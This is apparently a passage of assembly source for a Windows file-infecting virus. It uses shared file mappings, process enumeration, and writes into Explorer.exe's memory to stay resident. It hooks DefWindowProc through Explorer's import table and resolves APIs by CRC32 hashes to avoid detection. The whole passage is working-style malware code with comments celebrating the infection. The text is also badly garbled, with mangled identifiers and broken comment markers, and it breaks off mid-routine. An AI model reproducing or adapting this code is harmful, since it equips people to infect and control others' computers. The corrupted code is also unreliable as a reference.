MSDN SAYS:

;

"A Shared file-mapping object will not be destroyed uncle

All processes That Use it close their handles to it by using

The closehandle function. "

;

So the idea is to use createfilemapping and mapviewoffile,

; INSTEAD OF Virtualaloc ... The Read Open this

File-maping from a sales of code inject Into

Explorer.exe

; ================================================== =========== LEA EAX, DWORD PTR [EBP SZOBJECTNAME]

Push EAX

Push alloc_size

Push 00000000H

Push Page_Readwrite

Push 00000000H

Push 0FFFFFFFH

Call DWORD PTR [EBP A_CREATEFILEMAPPINGA]

OR EAX, EAX

JZ GOBACK2HOST

Mov Edi, EAX

Call DWORD PTR [EBP A_GETLASTERROR]

CMP EAX, 000000B7H; Error_Already_exists

Jne Rescheckok

Push EDI

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP GOBACK2HOST

Rescheckok: Push 00000000H

Push 00000000H

Push 00000000H

Push file_map_write

Push EDI

Call DWORD PTR [EBP A_MAPVIEWOFFILE]

OR EAX, EAX

JZ GOBACK2HOST

; ================================================== ===========

; Copy Virus to Allocated Memory Block

; ================================================== ===========

Lea ESI, DWORD PTR [EBP VIRO_SYS]

Mov Edi, EAX

MOV ECX, SIZE_VIRTUAL

CLD

REP MOVSB

; ================================================== ===========; Continue Execution On Allocated Memory !!!!!!!!!

;

; This means we areplay ...

; ================================================== ===========

Add Eax, Offset Hostvirmem - Offset Viro_Sys

Push EAX

RET

; ================================================== ===========================

Code Executed Into Allocated Memory ... Extended Buffers Are Available Now

; ================================================== ===========================

Hostvirmem: Call Memdelta

MEMDELTA: POP EBP

Sub EBP, Offset Memdelta

; ================================================== ===========; The Virus Needs to Locate System Directory in Order To Load

Dll's by using crc32 instead of their names

; ================================================== ===========

PUSH MAX_PATH

Lea EDI, DWORD PTR [EBP SZSYSTEMDIR]

Push EDI

Call DWORD PTR [EBP A_GETSYSTEMDIRECTORYA]

OR EAX, EAX

JZ GOBACK2HOST

EDI -> Points 1byte Above the Null Terminator

Add Edi, EAX

CLD

MOV EAX, 'D. * /'; add '* .dll'

Stosd

MOV EAX, 00004C4CH

Stosd

; ================================================== ===========

Get OS Version

; ================================================== ===========

Lea ESI, DWORD PTR [EBP SYSTEM_VERSION]

PUSH ESI

MOV DWORD PTR [ESI], 00000094H

Call DWORD PTR [EBP A_GETVERSIONEX] OR EAX, EAX

JZ FreeUser32

Add esi, 00000010H

CLD

Lodsd

CMP EAX, VER_PLATFORM_WIN32_NT

JE Meminfectwinnt

CMP EAX, VER_PLATFORM_WIN32_WINDOWS

JE MeminfectWin9x

; ================================================== ===========

Free USER32

; ================================================== ===========

FreeUser32: Push DWORD PTR [EBP HUSER32]

Call DWORD PTR [EBP A_FREELIBRARY]

; ================================================== ===========

; Back to Host

; ================================================== ===========

TBLDOPOLYPOPS EQU $

GOBACK2HOST: POP EAX

POP EAX

POP EAX

POP EAX

RET

; ================================================== ===========================; Residency Routines for Windows 9X

; ================================================== ===========================

; ================================================== ===========

Get Hands on User32.dll

; ================================================== ===========

MEMINFECTWIN9X: MOV EAX, DWORD PTR [EBP CRCSZUSER32]

Mov ECX, Numuser32APIS

LEA ESI, DWORD PTR [EBP CRC32USER32APISW9X]

Lea EDI, DWORD PTR [EBP EPUSER32APIS]

Call virloadlib

MOV DWORD PTR [EBP HUSER32], EAX

OR EAX, EAX

JZ GOBACK2HOST

; ================================================== ===========; the functions provided by the Tool Help Library Make IT

Easier for you to obtain information about currently

Executing Applications. Thase Functions Are Designed To

Streamline The Creation of Win32-Hosted Tools, Specifically

Debuggers

; ================================================== ===========

MOV EBX, DWORD PTR [EBP HKERNEL32]

MOV ECX, NumToolhelPapis

Lea ESI, DWORD PTR [EBP CRC32TOOL HPAPIPAPIS]

Lea EDI, DWORD PTR [EBP EPTOOLHELPAPIPIPIS]

Call get_apis

JECXZ DONETOOLHELP

ExitMemWin9x: JMP freeuser32

; ================================================== ===========

Take a Snapshot of the processsess currently loaded in the

; SYSTEM

;

The snapshot taken by createtoolhelpsnapshot function is

Examined by the other Tool Help functions to provide their

Results

;

Access to the Snapshot Is Read Only. The Snapshot Handle

ACTS LIKE An Object Handle and Is Subject To The Same Rules

Regarding which processes and threads it is valid in; ======================================= =====================

TH32CS_SNAPHEAPLIST EQU 00000001H

TH32CS_SNAPPROCESS EQU 00000002H

TH32CS_SNAPTHREAD EQU 00000004H

TH32CS_SNAPMODULE EQU 00000008H

TH32CS_INHERIT EQU 80000000H

TH32CS_SNAPALL EQU TH32CS_SNAPHEAPLIST OR /

TH32CS_SNAPPROCESS OR /

TH32CS_SNAPTHREAD OR /

TH32CS_SNAPMODULE

DONETOOLHELP: PUSH ECX; TH32PROCESSID

Push TH32CS_SNAPPROCESS; DWFLAGS

Call DWORD PTR [EBP A_CREATOOLHELP32SNAPSHOT]

CMP EAX, 0FFFFFFFH

JE EXITMEMWIN9X

MOV DWORD PTR [EBP HSNAPSHOT], EAX

; ================================================== ===========

; Retrieve Information About The First Process Encountered

; in the system snapshot

; ================================================== ===========

Lea EDI, DWORD PTR [EBP Processentry]

Push EDI

MOV DWORD PTR [EDI], SizeOfProcessentry

Push EAX

Call DWORD PTR [EBP A_PROCESS32FIRST]

OR EAX, EAX

JZ CloseNapshot

CheckProcentry: Lea ESI, DWORD PTR [EBP Proceszexefile] Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]

Call parse_filename

MOV ESI, EDX

Call get_str_crc32

CMP EDX, DWORD PTR [EBP CRCSZEXPLOR]; is Explorer.exe?

Je EfoundTrymod

; ================================================== ===========

Go to Next Process

; ================================================== ===========

Lea Eax, DWORD PTR [EBP Processentry]

Push Eax; LPPE

Push DWORD PTR [EBP HSNAPSHOT]; HSNAPSHOT

Call DWORD PTR [EBP A_PROCESS32NEXT]

OR EAX, EAX

JNZ CheckProcentry

CloseSnapshot: Push DWORD PTR [EBP HSNAPSHOT]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP exitmemwin9x

; ================================================== ===========

Close Snapshot and Create A New One, But this Time We Are

Going to List Modules Loaded by Explorer.exe

; ================================================== =========== EfoundTrymod: Push DWORD PTR [EBP HSNAPSHOT]

Call DWORD PTR [EBP A_CLOSEHANDLE]

Push DWORD PTR [EBP Proceth32Processid]; TH32Processid

Push TH32CS_SNAPModule; DWFLAGS

Call DWORD PTR [EBP A_CREATOOLHELP32SNAPSHOT]

CMP EAX, 0FFFFFFFH

JE EXITMEMWIN9X

MOV DWORD PTR [EBP HSNAPSHOT], EAX

; ================================================== ===========

: Perfect !!!! Lets Retrieve 1st Module Using Module32First

; ================================================== ===========

Lea EDI, DWORD PTR [EBP ModuleEntry]

Push EDI; LPME

MOV DWORD PTR [EDI], SizeOfmoduleEntry

Push Eax; hsnapshot

Call DWORD PTR [EBP A_MODULE32FIRST]

OR EAX, EAX

JZ CloseNapshot

; ================================================== ===========; Check if this is the module we are intended in

; ================================================== ===========

Checkemod: MOV Eax, DWORD PTR [EBP Proceth32Module]

CMP EAX, DWORD PTR [EBP MODETH32MODULEID]

Je getModdone

; ================================================== ===========

Go to Next Module

; ================================================== ===========

Push EDI; LPME

Push DWORD PTR [EBP HSNAPSHOT]; HSNAPSHOT

Call DWORD PTR [EBP A_MODULE32NEXT]

OR EAX, EAX

JNZ Checkemod

JMP CloseNapshot; Abortiff If Module Not Found

; ================================================== ============ hj0j0 ... Fine! Here WE Are Weth Explorer.exe Module Handle

; ================================================== ===========

GetModdone: MOV EDX, DWORD PTR [EBP MODEHMODULE]

MOV DWORD PTR [EBP HMODULE], EDX

; ================================================== ===========

; Open Process

; ================================================== ===========

MOV EAX, DWORD PTR [EBP Proceth32Processid]

Call OpenProcess

OR EAX, EAX

JZ CloseNapshot

; ================================================== ===========; duh! Explorer.exe Process is now 0wn3d

; ================================================== ===========

Call Fuckexplorer

; ================================================== ===========

Close Process

; ================================================== ===========

Push DWORD PTR [EBP HPROCESS]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP CloseNapshot

; ================================================== ===========================; Residency Routines for Windows NT & window 2000

; ================================================== ===========================

; ================================================== ===========

; Hands On User32 APIS for Windows NT (Use Wide Versions)

; ================================================== ===========

MEMINFECTWINNT: MOV EAX, DWORD PTR [EBP CRCSZUSER32]

Mov ECX, Numuser32APIS

LEA ESI, DWORD PTR [EBP CRC32USER32APISWNT]

Lea EDI, DWORD PTR [EBP EPUSER32APIS]

Call virloadlib

MOV DWORD PTR [EBP HUSER32], EAX

OR EAX, EAX

JZ GOBACK2HOST

; ================================================== ===========; We need psapi.dll to do the trick

; ================================================== ===========

MOV EAX, DWORD PTR [EBP CRCSZPSAPI]

MOV ECX, Numpsapiapis

Lea ESI, DWORD PTR [EBP CRC32PSAPIAPIAPIAPIAPIAPIS]

Lea EDI, DWORD PTR [EBP EPPSAPIAPIAPIS]

Call virloadlib

MOV DWORD PTR [EBP HPSAPI], EAX

OR EAX, EAX

JZ FreeUser32

; ================================================== ===========

Get a list of loaded processes (max. 32 processes)

; ================================================== ===========

DONEPSAPI: Lea EDI, DWORD PTR [EBP EP_BYTES]]

Push edi; cbeseded

PUSH 00000080H; CB

Lea ESI, DWORD PTR [EBP ProcessidList]

PUSH ESI

Call DWORD PTR [EBP A_ENUMPROCESSESSSESSS]]

OR EAX, EAX

JZ EXITMEMNT

; ================================================== ===========; To Determine How Many Processes Were Enumerated by The Call

t ENUMPROCESS, DIVIDE The Resulting Value in the cbeseded

Parameter by Sizeof (DWORD)

; ================================================== ===========

MOV ECX, DWORD PTR [EDI]

SHR ECX, 02H; Divide ECX BY 4 ... Nice, ISNT IT?

Jecxz ExitMemnt

; ================================================== ===========

Now We Have A List of Process Identifiers ... FOLLOW IT

; ================================================== ===========

ProcessLookup: Push ECX

CLD

Lodsd

PUSH ESI

; ================================================== ===========; Open Process

; ================================================== ===========

Call OpenProcess

OR EAX, EAX

JZ TrynextProcess

; ================================================== ===========

ENUMERATE Process Modules ... The 1st Obtained Module

Is The Executable Itself

; ================================================== ===========

LEA EDX, DWORD PTR [EBP EP_BYTES]; LPCBNEEDED

Push Edx

PUSH 00000080H; CB

Lea ESI, DWORD PTR [EBP MODULIST]

Push ESI; LPHMODULE

Push eax; hprocess

Call DWORD PTR [EBP A_ENUMPROCESSMODULES]]

OR EAX, EAX

JZ NcProcess

CLD

Lodsd; the first module is the .exe itself

MOV DWORD PTR [EBP HMODULE], EAX

; ================================================== ===========; Get Module Name Using GetModuleBaseNamea API

; ================================================== ===========

Push max_path; nsize

Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]

Push ESI; LPBASENAME

Push eax; hmodule

Push DWORD PTR [EBP HPROCESS]; HPROCESS

Call DWORD PTR [EBP A_GETMODULEBASENAMEA]

OR EAX, EAX

JZ NcProcess

; ================================================== ===========

Module Name Is Explorer.exe (Use CRC32 Comparison)

; ================================================== ===========

Mov EDI, ESI

Call parse_filename

MOV ESI, EDX

Call get_str_crc32

CMP EDX, DWORD PTR [EBP CRCSZEXPLOR]; is Explorer.exe?

JNE NCPROCESS

; ================================================== ===========; if Explorer.exe Found Cleanup and Go to the MEMORY

Infection Procedure

; ================================================== ===========

POP EAX

POP EAX

Call Fuckexplorer

; ================================================== ===========

Close Process

; ================================================== ===========

Push DWORD PTR [EBP HPROCESS]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP ExitMemnt

; ================================================== ===========

; Next process

; ================================================== ===========

NcProcess: Push DWORD PTR [EBP HPROCESS]

Call DWORD PTR [EBP A_CLOSEHANDLE]

TrynextProcess: POP ESI

POP ECX

Loop ProcessLookup

; ================================================== ===========

Residency Proc Failed!

; ================================================== ===========

ExitMEMNT: Push DWORD PTR [EBP HPSAPI]

Call DWORD PTR [EBP A_FREELIBRARY]

JMP freeuser32

; ================================================== ===========================

; Open Process

;

On Entry:

EAX -> Process ID

ON EXIT:

EAX -> Handle to Process or Null IF Error

; ================================================== =================================== process_Terminate EQU 00000001H

Process_create_thread EQU 00000002H

Process_set_sessionid EQU 00000004H

Process_vm_operation equ 00000008H

Process_vm_read equ 00000010H

Process_vm_write equ 00000020H

Process_dup_handle EQU 00000040h

Process_create_process EQU 00000080H

Process_set_quota EQU 00000100H

Process_set_information EQU 00000200H

Process_query_information EQU 00000400H

OpenProcess: Push Eax

Push 00000000H

Push Process_Query_information or /

Process_vm_read or /

Process_vm_write or /

Process_vm_operation

Call DWORD PTR [EBP A_OpenProcess]

MOV DWORD PTR [EBP HPROCESS], EAX

RET

; ================================================== ===========================

; Infect Explorer.exe in Memory

; ================================================== ===========================; ===================================================================================================================================================== =======================================

Now Search for the section Header List

; ================================================== ===========

FuckExplorer: Mov EBX, DWORD PTR [EBP HMODULE]

MOV ECX, 00000004H

Lea ESI, DWORD PTR [EBP EXPLORER_MZ_LFANEW]

MOV EAX, EBX

Add Eax, MZ_LFANew

Call ReadProcessmem

OR EAX, EAX

JZ Fe_exit

Lodsd; there is a cld at the end of readprocessmem

OR EAX, ESI -> Explorer_fh_sizeofoptionalheader

JZ Fe_exit

EAX -> MZ_LFANEW

Add Eax, EBX

Mov Edi, EAX

Add Eax, 00000004H FH_SIZEOFOPTIONALHEADER

Dec ECX

Dec ECX

Call ReadProcessmem

OR EAX, EAX

JZ Fe_exit

Lodsw; Just to do

ESI -> Explorer_fh_numberofsections

Mov Eax, EDI

Add Eax, 00000004H FH_NUMBEROFSECTIONS

Call ReadProcessmem

OR EAX, EAX

JZ Fe_exit

Lodsw; ESI -> Explorer_sectionHeader

Movzx ECX, AX; ECX -> Number of SectionsMovzx Eax, Word PTR [EBP Explorer_fh_sizeofoptionalheader]

Add Edi, EAX

Add EDI, 00000004H Image_SizeOf_File_Header

; ================================================== ===========

Search for a Suitable Section

; ================================================== ===========

Explorerhole: Push ECX

Mov Eax, EDI

MOV ECX, Image_SizeOf_SECTION_HEADER

Call ReadProcessmem

OR EAX, EAX

JZ E_NEXTSECTION

; ================================================== ===========

Is this a valid section?

; ================================================== ===========

CMP DWORD PTR [ESI SH_CHARACTERISTICS], /

Image_scn_mem_read or /

Image_scn_mem_write or /

Image_scn_cnt_initialized_data

JNE E_NEXTSECTION

MOV EAX, DWORD PTR [ESI SH_SIZEOFRAWDATA] SUB EAX, DWORD PTR [ESI SH_VIRTUALSIZE]

JS E_NEXTSECTION

CMP Eax, SizeOf_evl

JAE OK_E_SECTION

; ================================================== ===========

; Next section

; ================================================== ===========

E_NEXTSECTION: Add Edi, ECX

POP ECX

Loop Explorerhole

; ================================================== ===========

No Suitable Section Found

; ================================================== ===========

JMP fe_exit

; ================================================== ===========; Yes, this is a valid section ... Write Virus Loader

; ================================================== ===========

OK_E_SECTION: POP ECX; Cleanup Stack

MOV EAX, DWORD PTR [EBP A_DEFWINDOWPROC]

MOV DWORD PTR [EBP EVL_A_ORGINALAPIADDDR], EAX

MOV EAX, DWORD PTR [EBP A_OPENFILEMAPPINGA]

MOV DWORD PTR [EBP EVL_A_OPENFILEMAPPING], EAX

MOV EAX, DWORD PTR [EBP A_MAPVIEWOFFILE]

MOV DWORD PTR [EBP EVL_A_MAPVIEWOFFILE], EAX

MOV EAX, EBX

Add Eax, DWORD PTR [ESI SH_VIRTUALADDRESS]

Add Eax, DWORD PTR [ESI SH_VIRTUALSIZE]

MOV DWORD PTR [EBP Explorer_patch], EAX

Mov ECX, SIZEOF_EVL

LEA ESI, DWORD PTR [EBP EVL_CODE]

Call WriteProcessmem

OR EAX, EAX

JZ Fe_exit

; ================================================== ===========

Go to Explorer.exe Data Directory

; ================================================== =========== Mov EAX, EBX

Add Eax, DWORD PTR [EBP EXPLORER_MZ_LFANEW]

Add Eax, 00000004H /

Image_sizeof_file_header /

Oh_dataDirectory.de_import.dd_virtualaddress

MOV ECX, 00000004H

Lea ESI, DWORD PTR [EBP Explorer_de_import]

Call ReadProcessmem

OR EAX, EAX

JZ Fe_exit

; ================================================== ===========

; Search for User32 Import Module Descriptor

; ================================================== ===========

Lodsd

Add Eax, EBX

Mov Edi, EAX

E_Search_K32: Mov Eax, EDI

MOV ECX, Image_SizeOf_import_descriptor

Lea ESI, DWORD PTR [EBP Explorer_importDescriptor]

Call ReadProcessmem

OR EAX, EAX

JZ Fe_exit

; ================================================== ===========

Last Import Module Descriptor!?; ============================================= ==================

CMP DWORD PTR [ESI], 00000000H

JE Fe_exit

; ================================================== ===========

Check Import Module Descriptor ID_NAME

; ================================================== ===========

MOV EAX, EBX

Add Eax, DWORD PTR [ESI ID_NAME]

MOV ECX, 00000010H

Lea ESI, DWORD PTR [EBP EXPLORER_ID_NAME]

Call ReadProcessmem

OR EAX, EAX

JZ Fe_exit

Push EDI

Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]

Call parse_filename

MOV ESI, EDX

Call get_str_crc32

POP EDI

CMP EDX, DWORD PTR [EBP CRCSZUSER32]; Is User32.dll?

JE E_FOUND_K32

; ================================================== ===========

Next import module descriptor

; ================================================== =========== Add Edi, Image_SizeOf_Import_Descriptor

JMP E_SEARCH_K32

; ================================================== ===========

User32.dll Import Module Descriptor Found

; ================================================== ===========

E_FOUND_K32: MOV EDI, DWORD PTR [EBP /

Explorer_importDescriptor /

ID_Firstthunk]

Add Edi, EBX

MOV ECX, 00000004H

Lea ESI, DWORD PTR [EBP Explorer_HOOK]

E_NEXTTHUNK: MOV EAX, EDI

Call ReadProcessmem

OR EAX, EAX

JZ Fe_exit

MOV EAX, DWORD PTR [ESI]

OR EAX, EAX

JZ Fe_exit

CMP EAX, DWORD PTR [EBP A_DEFWINDOWPROC]

JE E_POISON

Add Edi, ECX

JMP E_NEXTTHUNK

; ================================================== ===========

Gotcha!

; ================================================== =========== E_Poison: Mov Eax, EDI

MOV DWORD PTR [EBP Explorer_init_hook], EAX

LEA ESI, DWORD PTR [EBP Explorer_patch]

Call writeprocessmem; ECX Already loaded

OR EAX, EAX

JZ Fe_exit

; ================================================== ===========

; Done !!!! ieieie !!!!

; ================================================== ===========

Fe_exit: Ret

; ================================================== ===========================

Code Injected Into Explorer.exe

;

The purpose of this code is to get access to virus memory from explorer.exe

; ================================================== =========================== EVL_CODE EQU $

; ================================================== ===========

; Let Some Space for the Return Address ... Then Save All Regs

; ================================================== ===========

Push EAX

Pushhad

; ================================================== ===========

This is The Original Address of the Api ... Lets make the

Return Address Point To IT

; ================================================== =========== DB 0B8H; EAX -> Original API Address

EVL_A_ORGINALAPIADDR DD 00000000H

MOV DWORD PTR [ESP CPUSHAD], EAX

; ================================================== ===========

; Attempt to Avoid Reentrance Problems

; ================================================== ===========

Call Multithreadsafe

DB 00H; ONLY CHANGED OVER HOOK CODE, NOT OVER Main Virus Body

Multithreadsafe: POP ESI

Mov EDI, ESI

CLD

Lodsb

OR Al, Al

JNZ MaybeonnextCall

Dec Al

Stosb

; ================================================== ===========

Try to open the virus file-mapping

;

There is some kinda race condition here ... if the infected

PROGRAM TERMINATES BEFORE THIS POINT WE WONT Be Able To

Find the rest of the virus in memory ...

;

; In That Case The Hook Will Stay Present, and this code may; becoming on Next Attemps

; ================================================== ===========

Call getszobjname; lpname

SzobjectName DB 10h DUP (00h)

Getszobjname: Push 00000000H; BinheritHandle

Mov Edi, File_Map_write

Push EDI; DWDESIREDACCESS

DB 0B8H; EAX -> OpenFilemappinga

EVL_A_OPENFILEMAPPING DD 00000000H

Call EAX

OR EAX, EAX

JZ MaybeonnextCall

; ================================================== ===========

The file-mapping is here ... Get An Image of IT

; ================================================== ===========

XOR EDX, EDX

Push Edx

Push Edx

Push Edx

Push EDI

Push EAX

DB 0B8H; EAX -> OpenFilemappinga

EVL_A_MAPVIEWOFFILE DD 00000000H

Call EAX

OR EAX, EAX

JZ MaybeonnextCall

; ================================================== ===========; Great! WE Have Access to Virus Allocated Memory, But

; Remember Weave INSIDE EXPLORER.EXE !!!!

;

; Jump to Virus Complete Image In Order to Complete

Initialization INSIDE Explorer.exe

; ================================================== ===========

Add Eax, Offset Explorerinit - Offset Viro_Sys

Call EAX

; ================================================== ===========

Restore Regs and Jump To Original API Code

; ================================================== ===========

MaybeonnextCall: Popad

RET

Sizeof_evl EQU $-EVL_CODE

; ================================================== ===========================; Read Process Memory Routine

;

On Entry:

EAX -> Pointer to the base address from which to read

; ECX -> Specifies the Requested Number of bytes To Read

ESI -> Pointer TO A Buffer That Receives The Contents from

; the address address

;

[EBP HPROCESS] Contains The Target Process Handle

;

ON EXIT:

EAX -> null if error

;

; EBX, ECX, ESI, EDI, EBP PRESERVED

; ================================================== ===========================

ReadProcessMem: Push EDI

Push ECX

Lea EDI, DWORD PTR [EBP EP_BYTES]; LPNUMBEROFBYTESREAD

Push EDI

Push ECX; nsize

Push ESI; LPBUFFER

Push Eax; lpbaseaddress

Push DWORD PTR [EBP HPROCESS]; HPROCESS

Call DWORD PTR [EBP A_READPROCESSMEMORY]

POP ECX

OR EAX, EAX

JZ EXITREM

CMP DWORD PTR [EDI], ECX

JE EXITREM

XOR EAX, EAX

EXITREM: POP EDI

CLD

RET

; ================================================== ===========================; Write Process Memory Routine

;

On Entry:

EAX -> Pointer to the base address in the specified process

To Which Data Will Be Written

; ECX -> Specifies the number of bytes to write

ESI -> Pointer to the buffer That Contains Data To Be Written

;

[EBP HPROCESS] Contains The Target Process Handle

;

ON EXIT:

EAX -> null if error

;

; EBX, ECX, ESI, EDI, EBP PRESERVED

; ================================================== ===========================

WriteProcessmem: Push EDI

Push ECX

LEA EDI, DWORD PTR [EBP EP_BYTES]; lpnumberofbyteswritten

Push EDI

Push ECX; nsize

Push ESI; LPBUFFER

Push Eax; lpbaseaddress

Push DWORD PTR [EBP HPROCESS]; HPROCESS

Call DWORD PTR [EBP A_WRITEPROCESSMORY]

POP ECX

OR EAX, EAX

JZ EXITWEM

CMP DWORD PTR [EDI], ECX

JE EXITWEM

XOR EAX, EAX

Exitwem: POP EDI

CLD

RET

; ================================================== ===========================; Make CRC look Table

;

Generate a Table for A Byte-Wise 32-Bit CRC Calculation On The Polynomial:

; x ^ 32 x ^ 26 x ^ 23 x ^ 22 x ^ 16 X ^ 12 X ^ 11 X ^ 10 X ^ 8 X ^ 7 X ^ 5 X ^ 4 X ^ 2 x 1.

;

Polynomials over GF (2) Are Represented in Binary, One Bit Per Coefficient,

WITH THE LOWEST POWERS in The Most Significant Bit. Then Adding Polynomials

Is Just Exclusive-or, And Multiplying a Polynomial by x Is a right shift by

; one. if we call the Above Polynomial P, And Repesent a byte as the

Polynomial Q, Also with the Lowest Power in The Most Significant Bit (So the Most)

; BYTE 0XB1 IS THE POLYNOMIAL X ^ 7 X ^ 3 X 1), THEN THE CRC IS (q * x ^ 32) MOD P,

WHERE A Mod B Means The Remainder After Dividing A By B.

;

This Calculation IS DONE Using The Shift-Register Method of Multiplying and

Taking the remainder. The register is initialized to zero, and for each

; incoming bit, x ^ 32 is added mod p to the register if the bit is a one (Where

; x ^ 32 MOD P IS P x ^ 32 = x ^ 26 ... 1), and the register is multiplied mod p by

; x (Which is shifting right by one and adding x ^ 32 mod p if the bit shifted

Out is a one). We Start with the highest power (Least Significant Bit) of

Q And Repeat for All Eight Bits of q.

;

The Table IS SIMPLY THE CRC of All Possible Eight Bit Values. This is all

................... ..

;

Original C C code by Mark Adler

Translated to asm for win32 by griyo

; ================================================== ===========================

Make_Crc_TBL:

; ================================================== ===========================

Make Exclusive-or Pattern from Polynomial (0edb88320h)

;

The Following Comment Code Is An Example of How To

Make The Exclusive-or Pattern from Polynomial

At runtime

;

; xor Edx, EDX

; MOV ECX, 0000000EH

Lea EBX, DWORD PTR [EBP TBL_TERMS]

; Calc_Poly: MOV EAX, ECX

; xlatb

Sub eax, 0000001FH

Neg EAX

; BTS EDX, EAX

Loop Calc_Poly

;

Edx Contains now the Exclusive-or Pattern

;

The Polynomial IS:

;

; X ^ 32 x ^ 26 x ^ 23 x ^ 22 x ^ 16 X ^ 12 X ^ 11 X ^ 10 X ^ 8 X ^ 7 X ^ 5 X ^ 4 X ^ 2 x ^ 1 x ^ 0

;

TBL_TERMS DB 0, 1, 2, 4, 5, 7, 8, 10, 11, 12, 16, 22, 23, 26

;

; ================================================== =========================== CLD

MOV ECX, 00000100H

Lea EDI, DWORD PTR [EBP TBL_CRC32]

CRC_TBL_DO: MOV EAX, 000000FFH

Sub Eax, ECX

Push ECX

MOV ECX, 00000008H

Make_Crc_Value: SHR EAX, 01H

JNC Next_Value

xor eax, 0edb88320h

Next_Value: loop make_crc_value

POP ECX

Stosd

LOOP CRC_TBL_DO

RET

; ================================================== ===========================

RETURN A 32bit CRC of the Contents of the Buffer

;

On Entry:

ESI -> PTR TO BUFFER

; ECX -> Buffer Size

ON EXIT:

; EDX -> 32bit CRC

; ================================================== ===========================

GET_CRC32: CLD

Push EDI

XOR EDX, EDX

Lea EDI, DWORD PTR [EBP TBL_CRC32]

CRC_CALC: PUSH ECX

Lodsb

XOR EAX, EDX

And Eax, 000000FFH

SHR EDX, 08H

XOR EDX, DWORD PTR [EDI EAX] POP ​​ECX

Loop CRC_CALC

POP EDI

RET

; ================================================== ===========================

; Get a 32bit CRC of a null Terminated Array

;

On Entry:

ESI-> Ptr to string

EXIT:

; EDX -> 32bit CRC

; ================================================== ===========================

GET_STR_CRC32: CLD

Push ECX

Push EDI

Mov EDI, ESI

XOR EAX, EAX

MOV ECX, EAX

CRC_SZ: INC ECX

Scasb

JNZ CRC_SZ

Call get_crc32

POP EDI

POP ECX

RET

; ================================================== ===========================

Get the entry-points of getprocaddress

;

On Entry:

EBX -> kernell32 base address

ON EXIT:

; ECX -> Address of getProcaddress

; ================================================== =========================== GetgetProcaddr: CLD

MOV EAX, DWORD PTR [EBX Image_DOS_HEADER.MZ_LFANEW]

MOV EDX, DWORD PTR [EAX /

EBX /

NT_OPTIONALHEADER. /

Oh_directoryEntries. /

DE_EXPORT. /

DD_VIRTUALADDRESS]

Add Edx, EBX

MOV ESI, DWORD PTR [EDX ED_ADDRESSOFNAMES]]

Add ESI, EBX

MOV EDI, DWORD PTR [EDX ED_ADDRESSOFNAMEORDINALS]

Add Edi, EBX

MOV ECX, DWORD PTR [EDX ED_NUMBEROFNAMES]]

Function_loop: Lodsd

Push Edx

PUSH ESI

Lea ESI, DWORD PTR [EAX EBX]; Get Ptr To API Name

Call get_str_crc32; get crc32 of api name

POP ESI

CMP EDX, DWORD PTR [EBP CRCGETPROCADDR]

JE API_FOUND

Inc EDI

Inc EDI

POP EDX

LOOP Function_LOOP

RET

API_FOUND: POP EDX

Movzx Eax, Word PTR [EDI]

SUB EAX, DWORD PTR [EDX ED_BASEORDINAL]

INC EAX

SHL EAX, 02H

MOV ESI, DWORD PTR [EDX ED_ADDRESSOFFUNCTIONS]

Add ESI, ESI

Add ESI, EBX

Lodsd

Lea ECX, DWORD PTR [EAX EBX]

RET

; ================================================== ===========================

Get the entry-point of each needed API

;

THIS ROUTINE Uses The CRC32 INSTEAD OF API Names

;

On Entry:

EBX -> Base Address Of DLL

; ECX -> Number of Apis in The Folling Buffer

ESI -> Buffer Filled with The CRC32 of Each API Name

EDI -> Recives Found API Addresses

ON EXIT:

; ECX -> IS 00000000h if everything was ok

; ================================================== ===========================

GET_APIS: CLD

GET_EACH_API: PUSH ECX

PUSH ESI

; ================================================== ===========

Get a Pointer to the Export Data

; ================================================== ===========

MOV EAX, DWORD PTR [EBX Image_DOS_HEADER.MZ_LFANEW]

MOV EDX, DWORD PTR [EAX /

EBX /

NT_OPTIONALHEADER. /

Oh_directoryEntries. /

DE_EXPORT. /

DD_VIRTUALADDRESS]

Add Edx, EBX

MOV ESI, DWORD PTR [EDX ED_ADDRESSOFNAMES]]

Add ESI, EBX

MOV ECX, DWORD PTR [EDX ED_NUMBEROFNAMES]]

; ================================================== ============; try to find an API Name That Matches Given CRC32

; ================================================== ===========

API_LOOP: LODSD

Push ESI; PTR to AddressofNames

Lea ESI, DWORD PTR [EAX EBX]

Push ESI; Save Ptr To API Name

Call get_str_crc32

MOV ESI, DWORD PTR [ESP 00000008H]

Lodsd

CMP EAX, EDX

JE CRC_API_FOND

POP Eax; Remove API Name from Stack

PTR to RVA for Next API Name

LOOP API_LOOP

GET_API_ERROR: POP ESI; PTR To CRC's of API Names

POP ECX; Number of API's

Ret; exit with error (ECX! = NULL)

; ================================================== ===========

The Ptr To Api Name Is Already on Stack, Now Push THE

Module Handle and Call GetProcaddress

; ================================================== =========== CRC_API_FOUND: PUSH EBX

Call DWORD PTR [EBP A_GETPROCADDRESS]

Cld; Dont Let the Api Call Change This THIS

Pop Edx; Remove Ptr To Rva for Next Name

OR EAX, EAX

JZ get_api_error; if getprocaddress returned null exit

STOSD; Save the API Address Into Given Table

PTR to CRC's of API Names

Lodsd

POP ECX

LOOP GET_EACH_API

RET

; ================================================== ===========================

Find base address of kernel32.dll

THANKS TO JACKY QWERTY for the SEH ROUTINES

; ================================================== ===========================

SEH_BLOCK_0000 MACRO

Add ESP, -CPUSHAD

JNZ GNTBA_L1

ENDM

IgetNTBaseAddr: @seh_setupframe

MOV ECX, EDX

XCHG AX, CX

GNTBA_L0: DEC CX

JZ GNTBA_L2

Add Eax, -10000H

Pushhad

MOV BX, -IMAGE_DOS_SIGNATURE

Add BX, Word PTR [EAX]

Mov ESI, EAXJNZ GNTBA_L1

MOV EBX, -IMAGE_NT_SIGNATURE

Add Eax, DWORD PTR [ESI.MZ_LFANEW]

Mov EDX, ESI

Add Ebx, DWORD PTR [EAX]

JNZ GNTBA_L1

Add Edx, [Eax.nt_OptionalHeader.oh_directoryEntries. /

DE_EXPORT.DD_VIRTUALADDRESS]

Add ESI, DWORD PTR [EDX.ED_NAME]

Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]

Call parse_filename

MOV ESI, EDX

Call get_str_crc32

CMP EDX, DWORD PTR [EBP CRCKERNEL32]; Is Kernel32.dll?

JE K32_F

